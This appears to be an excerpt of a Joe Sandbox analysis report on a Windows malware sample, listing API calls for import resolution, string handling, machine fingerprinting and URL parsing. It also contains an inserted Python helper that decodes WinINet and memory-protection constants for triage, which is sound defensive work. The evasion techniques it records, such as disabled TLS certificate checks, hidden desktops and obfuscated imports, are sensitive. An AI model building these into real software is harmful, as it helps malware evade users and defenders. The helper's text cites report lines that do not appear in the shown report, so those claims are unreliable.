                            • LoadLibraryA.KERNEL32(00FFD9D8), ref: 00456B16
                            • LoadLibraryA.KERNEL32(00FFD8E8), ref: 00456B28
                            • LoadLibraryA.KERNEL32(00FFDB10), ref: 00456B3A
                            • LoadLibraryA.KERNEL32(00FFDAB0), ref: 00456B4B
                            • LoadLibraryA.KERNEL32(00FFD8D0), ref: 00456B5D
                            • LoadLibraryA.KERNEL32(00FFD8A0), ref: 00456B6F
                            • LoadLibraryA.KERNEL32(00FFDA38), ref: 00456B80
                            • GetProcAddress.KERNEL32(751E0000,00FE60D8), ref: 00456B9C
                            • GetProcAddress.KERNEL32(751E0000,00FFDA68), ref: 00456BB4
                            • GetProcAddress.KERNEL32(751E0000,00FF92D0), ref: 00456BCD
                            • GetProcAddress.KERNEL32(751E0000,00FFDA50), ref: 00456BE5
                            • GetProcAddress.KERNEL32(751E0000,00FE60F8), ref: 00456BFD
                            • GetProcAddress.KERNEL32(73FC0000,00FEA6C0), ref: 00456C1D
                            • GetProcAddress.KERNEL32(73FC0000,00FE66B8), ref: 00456C35
                            • GetProcAddress.KERNEL32(73FC0000,00FEA800), ref: 00456C4E
                            • GetProcAddress.KERNEL32(73FC0000,00FFDB70), ref: 00456C66
                            • GetProcAddress.KERNEL32(73FC0000,00FFD9A8), ref: 00456C7E
                            • GetProcAddress.KERNEL32(73FC0000,00FE6618), ref: 00456C97
                            • GetProcAddress.KERNEL32(73FC0000,00FE6698), ref: 00456CAF
                            • GetProcAddress.KERNEL32(73FC0000,00FFDB40), ref: 00456CC7
                            • GetProcAddress.KERNEL32(753A0000,00FE67B8), ref: 00456CE3
                            • GetProcAddress.KERNEL32(753A0000,00FE67D8), ref: 00456CFB
                            • GetProcAddress.KERNEL32(753A0000,00FFDAC8), ref: 00456D14
                            • GetProcAddress.KERNEL32(753A0000,00FFD990), ref: 00456D2C
                            • GetProcAddress.KERNEL32(753A0000,00FE6638), ref: 00456D44
                            • GetProcAddress.KERNEL32(76310000,00FEAAF8), ref: 00456D64
                            • GetProcAddress.KERNEL32(76310000,00FEA710), ref: 00456D7C
                            • GetProcAddress.KERNEL32(76310000,00FFDB28), ref: 00456D95
                            • GetProcAddress.KERNEL32(76310000,00FE6598), ref: 00456DAD
                            • GetProcAddress.KERNEL32(76310000,00FE6798), ref: 00456DC5
                            • GetProcAddress.KERNEL32(76310000,00FEAA08), ref: 00456DDE
                            • GetProcAddress.KERNEL32(76910000,00FFD930), ref: 00456DFE
                            • GetProcAddress.KERNEL32(76910000,00FE64F8), ref: 00456E16
                            • GetProcAddress.KERNEL32(76910000,00FF9420), ref: 00456E2F
                            • GetProcAddress.KERNEL32(76910000,00FFD9C0), ref: 00456E47
                            • GetProcAddress.KERNEL32(76910000,00FFDAE0), ref: 00456E5F
                            • GetProcAddress.KERNEL32(76910000,00FE6578), ref: 00456E78
                            • GetProcAddress.KERNEL32(76910000,00FE6658), ref: 00456E90
                            • GetProcAddress.KERNEL32(76910000,00FFDAF8), ref: 00456EA8
                            • GetProcAddress.KERNEL32(76910000,00FFD888), ref: 00456EC1
                            • GetProcAddress.KERNEL32(76910000,CreateDesktopA), ref: 00456ED7
                            • GetProcAddress.KERNEL32(76910000,OpenDesktopA), ref: 00456EEE
                            • GetProcAddress.KERNEL32(76910000,CloseDesktop), ref: 00456F05
                            • GetProcAddress.KERNEL32(75B30000,00FE6858), ref: 00456F21
                            • GetProcAddress.KERNEL32(75B30000,00FFD8B8), ref: 00456F39
                            • GetProcAddress.KERNEL32(75B30000,00FFD900), ref: 00456F52
                            • GetProcAddress.KERNEL32(75B30000,00FFD948), ref: 00456F6A
                            • GetProcAddress.KERNEL32(75B30000,00FFD960), ref: 00456F82
                            • GetProcAddress.KERNEL32(75670000,00FE67F8), ref: 00456F9E
                            • GetProcAddress.KERNEL32(75670000,00FE6838), ref: 00456FB6
                            • GetProcAddress.KERNEL32(76AC0000,00FE6718), ref: 00456FD2
                            • GetProcAddress.KERNEL32(76AC0000,00FFD978), ref: 00456FEA
                            • GetProcAddress.KERNEL32(6F4D0000,00FE65B8), ref: 0045700A
                            • GetProcAddress.KERNEL32(6F4D0000,00FE6878), ref: 00457022
                            • GetProcAddress.KERNEL32(6F4D0000,00FE65D8), ref: 0045703B
                            • GetProcAddress.KERNEL32(6F4D0000,00FFDE40), ref: 00457053
                            • GetProcAddress.KERNEL32(6F4D0000,00FE6818), ref: 0045706B
                            • GetProcAddress.KERNEL32(6F4D0000,00FE66D8), ref: 00457084
                            • GetProcAddress.KERNEL32(6F4D0000,00FE64D8), ref: 0045709C
                            • GetProcAddress.KERNEL32(6F4D0000,00FE6518), ref: 004570B4
                            • GetProcAddress.KERNEL32(6F4D0000,InternetSetOptionA), ref: 004570CB
                            • GetProcAddress.KERNEL32(6F4D0000,HttpQueryInfoA), ref: 004570E2
                            • GetProcAddress.KERNEL32(75AE0000,00FFDD50), ref: 004570FE
                            • GetProcAddress.KERNEL32(75AE0000,00FF9300), ref: 00457116
                            • GetProcAddress.KERNEL32(75AE0000,00FFDCD8), ref: 0045712F
                            • GetProcAddress.KERNEL32(75AE0000,00FFDBB8), ref: 00457147
                            • GetProcAddress.KERNEL32(76300000,00FE6538), ref: 00457163
                            • GetProcAddress.KERNEL32(6D3F0000,00FFDBA0), ref: 0045717F
                            • GetProcAddress.KERNEL32(6D3F0000,00FE65F8), ref: 00457197
                            • GetProcAddress.KERNEL32(6D3F0000,00FFDBD0), ref: 004571B0
                            • GetProcAddress.KERNEL32(6D3F0000,00FFDC30), ref: 004571C8
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                            • API String ID: 2238633743-3468015613
                            • Opcode ID: 1483e82d52bd042b0b0c463fa581eb45bf7f9db82a3f049354c261c75735da3d
                            • Instruction ID: 48fc0dd9fe99f83ccfc4da9faaf98814cdd0ed980b1145a5568fec747095c6ea
                            • Opcode Fuzzy Hash: 1483e82d52bd042b0b0c463fa581eb45bf7f9db82a3f049354c261c75735da3d
                            • Instruction Fuzzy Hash: 1E624AB5618200AFD754DFB4EC88A263BBFF789345310AA1DED5683364DBB4A810DB70
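The three API lists above are easier to triage once the numeric arguments are decoded: the download routine at 436c40 passes option 0x1F (INTERNET_OPTION_SECURITY_FLAGS) with value 0x10300 to InternetSetOptionA and queries 0x13 (HTTP_QUERY_STATUS_CODE); the function at 434a60 calls VirtualProtect with protection 0x100 (PAGE_GUARD); and the resolver at 4566e0 passes most import names as pointers into the sample's decrypted-string area (00FExxxx/00FFxxxx) but a handful in plaintext. The following Python helper is an added example for this page, not code from the Joe Sandbox report or from the sample: it parses lines in the report's "API.MODULE(args), ref: addr" format, decodes the constants against values from the Windows SDK headers wininet.h and winnt.h, and runs three triage checks over the result. The embedded sample lines are copied from the API lists above; the constant tables, the triage checks and the function names are the example's own. Bits it does not recognise (here the 0x10000 bit of the security flags value) are reported as unknown rather than guessed.

```python
import re
from dataclasses import dataclass

# Matches e.g. "• InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00436D77"
API_LINE = re.compile(
    r"^\s*(?:•\s*)?(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

SECURITY_FLAGS = {  # wininet.h, the value passed with INTERNET_OPTION_SECURITY_FLAGS
    0x00000080: "SECURITY_FLAG_IGNORE_REVOCATION",
    0x00000100: "SECURITY_FLAG_IGNORE_UNKNOWN_CA",
    0x00000200: "SECURITY_FLAG_IGNORE_WRONG_USAGE",
    0x00001000: "SECURITY_FLAG_IGNORE_CERT_CN_INVALID",
    0x00002000: "SECURITY_FLAG_IGNORE_CERT_DATE_INVALID",
    0x00004000: "SECURITY_FLAG_IGNORE_REDIRECT_TO_HTTPS",
    0x00008000: "SECURITY_FLAG_IGNORE_REDIRECT_TO_HTTP",
}
PAGE_PROTECT = {  # winnt.h memory protection constants
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
    0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE",
}
INTERNET_OPTION_SECURITY_FLAGS = 31  # 0x1F
HTTP_QUERY_STATUS_CODE = 19          # 0x13
INTERNET_SERVICE_HTTP = 3


@dataclass
class ApiCall:
    api: str
    module: str
    args: list   # argument strings exactly as the report prints them
    ref: int     # call-site address


def parse_api_line(line):
    """Parse one report line; returns None for lines that are not API calls."""
    m = API_LINE.match(line)
    if not m:
        return None
    raw = m.group("args").strip()
    args = [a.strip() for a in raw.split(",")] if raw else []
    return ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16))


def arg_value(raw):
    """DWORD value of a printed argument, or None for '?' and literal strings.
    The report prints 8 hex digits and shows high-bit values with a leading '-',
    so '-00400100' is read as 32-bit two's complement (0xFFBFFF00)."""
    if not re.fullmatch(r"-?[0-9A-Fa-f]{8}", raw):
        return None
    return int(raw, 16) & 0xFFFFFFFF


def decode_flags(value, table):
    """Split a bitmask into known flag names; leftover bits are reported, not guessed."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    known = sum(bit for bit in table if value & bit)
    rest = value & ~known & 0xFFFFFFFF
    if rest:
        names.append(f"unknown:0x{rest:X}")
    return names


def annotate(call):
    """Human-readable notes for the argument patterns that occur in this report."""
    a = [arg_value(x) for x in call.args]
    if call.api == "InternetSetOptionA" and len(a) >= 3 and a[1] == INTERNET_OPTION_SECURITY_FLAGS and a[2] is not None:
        return ["INTERNET_OPTION_SECURITY_FLAGS = " + "|".join(decode_flags(a[2], SECURITY_FLAGS))]
    if call.api == "HttpQueryInfoA" and len(a) >= 2 and a[1] == HTTP_QUERY_STATUS_CODE:
        return ["HTTP_QUERY_STATUS_CODE"]
    if call.api == "InternetConnectA" and len(a) >= 6 and a[5] == INTERNET_SERVICE_HTTP:
        return ["INTERNET_SERVICE_HTTP"]
    if call.api == "InternetReadFile" and len(a) >= 3 and a[2] is not None:
        return [f"read buffer {a[2]} bytes"]
    if call.api == "VirtualProtect" and len(a) >= 3 and a[2] is not None:
        return ["flNewProtect = " + "|".join(decode_flags(a[2], PAGE_PROTECT))]
    return []


def triage(lines):
    """Three checks over report lines: TLS validation disabled, guard page, import resolution."""
    findings = {"tls_checks_disabled": False, "guard_page": False,
                "getprocaddress_calls": 0, "loadlibrary_calls": 0, "plaintext_imports": []}
    for call in filter(None, map(parse_api_line, lines)):
        a = [arg_value(x) for x in call.args]
        if (call.api == "InternetSetOptionA" and len(a) >= 3 and a[1] == INTERNET_OPTION_SECURITY_FLAGS
                and a[2] is not None
                and any(n.startswith("SECURITY_FLAG_IGNORE") for n in decode_flags(a[2], SECURITY_FLAGS))):
            findings["tls_checks_disabled"] = True
        if call.api == "VirtualProtect" and len(a) >= 3 and a[2] is not None and a[2] & 0x100:
            findings["guard_page"] = True  # PAGE_GUARD requested
        if call.api == "GetProcAddress":
            findings["getprocaddress_calls"] += 1
            # A name printed literally rather than as a pointer is an import the sample did not hide.
            if len(call.args) >= 2 and call.args[1] != "?" and arg_value(call.args[1]) is None:
                findings["plaintext_imports"].append(call.args[1])
        if call.api == "LoadLibraryA":
            findings["loadlibrary_calls"] += 1
    return findings


# Constructed input: lines copied verbatim from the API lists in this report.
SAMPLE = """\
• InternetOpenA.WININET(0045CFEC,00000001,00000000,00000000,00000000), ref: 00436CD5
• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00436D15
• HttpOpenRequestA.WININET(00000000,GET,?,00FFF490,00000000,00000000,-00400100,00000000), ref: 00436D50
• InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00436D77
• HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00436DA5
• InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00436DFF
• VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00434BB0
• GetProcAddress.KERNEL32(76210000,00FE63B8), ref: 004566F5
• LoadLibraryA.KERNEL32(00FFDA20,0045051F), ref: 00456B05
• GetProcAddress.KERNEL32(76910000,CreateDesktopA), ref: 00456ED7
• GetProcAddress.KERNEL32(6F4D0000,InternetSetOptionA), ref: 004570CB
""".splitlines()

if __name__ == "__main__":
    for line in SAMPLE:
        call = parse_api_line(line)
        for note in annotate(call):
            print(f"{call.ref:08X} {call.api}: {note}")
    print(triage(SAMPLE))
```

Run over the sample lines the helper reports the security-flags value as SECURITY_FLAG_IGNORE_UNKNOWN_CA|SECURITY_FLAG_IGNORE_WRONG_USAGE|unknown:0x10000, the VirtualProtect protection as PAGE_GUARD, the InternetReadFile buffer as 1999 bytes, and lists CreateDesktopA and InternetSetOptionA as the plaintext imports among the GetProcAddress calls it was given. The HttpOpenRequestA flags argument (-00400100) is deliberately left undecoded: taken as a two's-complement DWORD it sets nearly every bit, and the report gives no way to tell whether that is the real value or a display artefact.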
                            APIs
                            • lstrlen.KERNEL32(0045CFEC), ref: 0044F1D5
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0044F1F1
                            • lstrlen.KERNEL32(0045CFEC), ref: 0044F1FC
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0044F215
                            • lstrlen.KERNEL32(0045CFEC), ref: 0044F220
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0044F239
                            • lstrcpy.KERNEL32(00000000,00464FA0), ref: 0044F25E
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0044F28C
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0044F2C0
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0044F2F0
                            • lstrlen.KERNEL32(00FE61F8), ref: 0044F315
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID: ERROR
                            • API String ID: 367037083-2861137601
                            • Opcode ID: 9e3adf3ea52060e018a155f9e3083566356407eac9b95b276bc105d14d2c963a
                            • Instruction ID: 700f3ff1e0577e25344fd29339c00363cc299a331282ec5905263d3fe264ecf8
                            • Opcode Fuzzy Hash: 9e3adf3ea52060e018a155f9e3083566356407eac9b95b276bc105d14d2c963a
                            • Instruction Fuzzy Hash: 7BA25C70A012029FEB20EF75D948A5BB7F5AF44304F29907AE809DB361DB79DC46CB58
                            APIs
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00450013
                            • lstrlen.KERNEL32(0045CFEC), ref: 004500BD
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 004500E1
                            • lstrlen.KERNEL32(0045CFEC), ref: 004500EC
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00450110
                            • lstrlen.KERNEL32(0045CFEC), ref: 0045011B
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0045013F
                            • lstrlen.KERNEL32(0045CFEC), ref: 0045015A
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00450189
                            • lstrlen.KERNEL32(0045CFEC), ref: 00450194
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 004501C3
                            • lstrlen.KERNEL32(0045CFEC), ref: 004501CE
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00450206
                            • lstrlen.KERNEL32(0045CFEC), ref: 00450250
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00450288
                            • lstrcpy.KERNEL32(00000000,?), ref: 0045059B
                            • lstrlen.KERNEL32(00FE6398), ref: 004505AB
                            • lstrcpy.KERNEL32(00000000,?), ref: 004505D7
                            • lstrcat.KERNEL32(00000000,?), ref: 004505E3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0045060E
                            • lstrlen.KERNEL32(00FFF580), ref: 00450625
                            • lstrcpy.KERNEL32(00000000,?), ref: 0045064C
                            • lstrcat.KERNEL32(00000000,?), ref: 00450658
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00450681
                            • lstrlen.KERNEL32(00FE6478), ref: 00450698
                            • lstrcpy.KERNEL32(00000000,?), ref: 004506C9
                            • lstrcat.KERNEL32(00000000,?), ref: 004506D5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00450706
                            • lstrcpy.KERNEL32(00000000,00FF9360), ref: 0045074B
                              • Part of subcall function 00431530: lstrcpy.KERNEL32(00000000,?), ref: 00431557
                              • Part of subcall function 00431530: lstrcpy.KERNEL32(00000000,?), ref: 00431579
                              • Part of subcall function 00431530: lstrcpy.KERNEL32(00000000,?), ref: 0043159B
                              • Part of subcall function 00431530: lstrcpy.KERNEL32(00000000,?), ref: 004315FF
                            • lstrcpy.KERNEL32(00000000,?), ref: 0045077F
                            • lstrcpy.KERNEL32(00000000,00FFF610), ref: 004507E7
                            • lstrcpy.KERNEL32(00000000,00FF9110), ref: 00450858
                            • lstrcpy.KERNEL32(00000000,fplugins), ref: 004508CF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00450928
                            • lstrcpy.KERNEL32(00000000,00FF91A0), ref: 004509F8
                              • Part of subcall function 004324E0: lstrcpy.KERNEL32(00000000,?), ref: 00432528
                              • Part of subcall function 004324E0: lstrcpy.KERNEL32(00000000,?), ref: 0043254E
                              • Part of subcall function 004324E0: lstrcpy.KERNEL32(00000000,?), ref: 00432577
                            • lstrcpy.KERNEL32(00000000,00FF9170), ref: 00450ACE
                            • lstrcpy.KERNEL32(00000000,?), ref: 00450B81
                            • lstrcpy.KERNEL32(00000000,00FF9170), ref: 00450D58
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat
                            • String ID: fplugins
                            • API String ID: 2500673778-38756186
                            • Opcode ID: 26a1543bb302a97b43072489c6ef1775c95b9e719096dca9b913f52612548b0b
                            • Instruction ID: 374682ae74a9943c036692ab673f60c04b1917a8ebaa5f14ffeb383f71996368
                            • Opcode Fuzzy Hash: 26a1543bb302a97b43072489c6ef1775c95b9e719096dca9b913f52612548b0b
                            • Instruction Fuzzy Hash: 8FE29C71A053418FD734DF2AC484B5AB7E0BF88305F58856EE88D8B362DB79D849CB46
                            APIs
                            • lstrlen.KERNEL32(00FE61F8), ref: 0044F315
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044F3A3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044F3C7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044F47B
                            • lstrcpy.KERNEL32(00000000,00FE61F8), ref: 0044F4BB
                            • lstrcpy.KERNEL32(00000000,00FF93C0), ref: 0044F4EA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044F59E
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0044F61C
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044F64C
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044F69A
                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 0044F718
                            • lstrlen.KERNEL32(00FF9320), ref: 0044F746
                            • lstrcpy.KERNEL32(00000000,00FF9320), ref: 0044F771
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044F793
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044F7E4
                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 0044FA32
                            • lstrlen.KERNEL32(00FF9350), ref: 0044FA60
                            • lstrcpy.KERNEL32(00000000,00FF9350), ref: 0044FA8B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044FAAD
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044FAFE
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID: ERROR
                            • API String ID: 367037083-2861137601
                            • Opcode ID: 485bac86ec37ee6ede6ea69bd9618c0f0b82b41ca74b2178999e7e4b165d1572
                            • Instruction ID: 3d56af4ea4f152639c3b77903187499b52a86b23c9635541bf3d8848b1e4a6a3
                            • Opcode Fuzzy Hash: 485bac86ec37ee6ede6ea69bd9618c0f0b82b41ca74b2178999e7e4b165d1572
                            • Instruction Fuzzy Hash: 6EF14D70A01202CFEB24DF69C944A1AB7F5BF44314B2991BFD8099B361EB79DC46CB58

                            Control-flow Graph
                            • Function 448ca0-448eef (graph image not rendered): blocks call StrCmpCA, ExitProcess, lstrlen and lstrcpy, plus subroutines 432a20 and 432930.
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID: block
                            • API String ID: 621844428-2199623458
                            • Opcode ID: a146e3048cdcd355f448d7762ef9e3d6ea45f06cda6e359cd3d620b2aaa9df58
                            • Instruction ID: 793173d812c81a9a6a6e1e3408283b43f67659f72d9caea9fc95f23e4de4fb3e
                            • Opcode Fuzzy Hash: a146e3048cdcd355f448d7762ef9e3d6ea45f06cda6e359cd3d620b2aaa9df58
                            • Instruction Fuzzy Hash: B9517D70A04701DFEB21AF79DD84A2F7BF8BB54705B20582EE542C2611DBBCD4429B2A

                            Control-flow Graph
                            • Function 452740-452872 (graph image not rendered): blocks call GetWindowsDirectoryA, GetVolumeInformationA, GetProcessHeap, RtlAllocateHeap and wsprintfA, plus subroutine 4571e0.
                            APIs
                            • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 0045277B
                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,004493B6,00000000,00000000,00000000,00000000), ref: 004527AC
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0045280F
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00452816
                            • wsprintfA.USER32 ref: 0045283B
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                            • String ID: :\$C
                            • API String ID: 2572753744-3309953409
                            • Opcode ID: 4aa164a4989e14daaa3be4549d9cfe61fece48d857ef72b232c9bee4cfdb633d
                            • Instruction ID: ee4ae8b9d895e1535123831aa8dac787bd6f260257a394d472edf61c9f3554c1
                            • Opcode Fuzzy Hash: 4aa164a4989e14daaa3be4549d9cfe61fece48d857ef72b232c9bee4cfdb633d
                            • Instruction Fuzzy Hash: FD3181B1904209AFCB14DFB88A859EFBFBCEF59701F10016EE905E7251E2748A448BA5

                            Control-flow Graph
                            • Function 434bc0-434c48 (graph image not rendered): blocks call ??2@YAPAXI@Z (3 times), lstrlen and InternetCrackUrlA, plus subroutine 432a20.
                            APIs
                            • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 00434BF7
                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00434C01
                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00434C0B
                            • lstrlen.KERNEL32(?,00000000,?), ref: 00434C1F
                            • InternetCrackUrlA.WININET(?,00000000), ref: 00434C27
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ??2@$CrackInternetlstrlen
                            • String ID: <
                            • API String ID: 1683549937-4251816714
                            • Opcode ID: ce0c6f00ce4a5c73a28ed25031f023cb2cb441e63d4b49a40aef3a464ea908a6
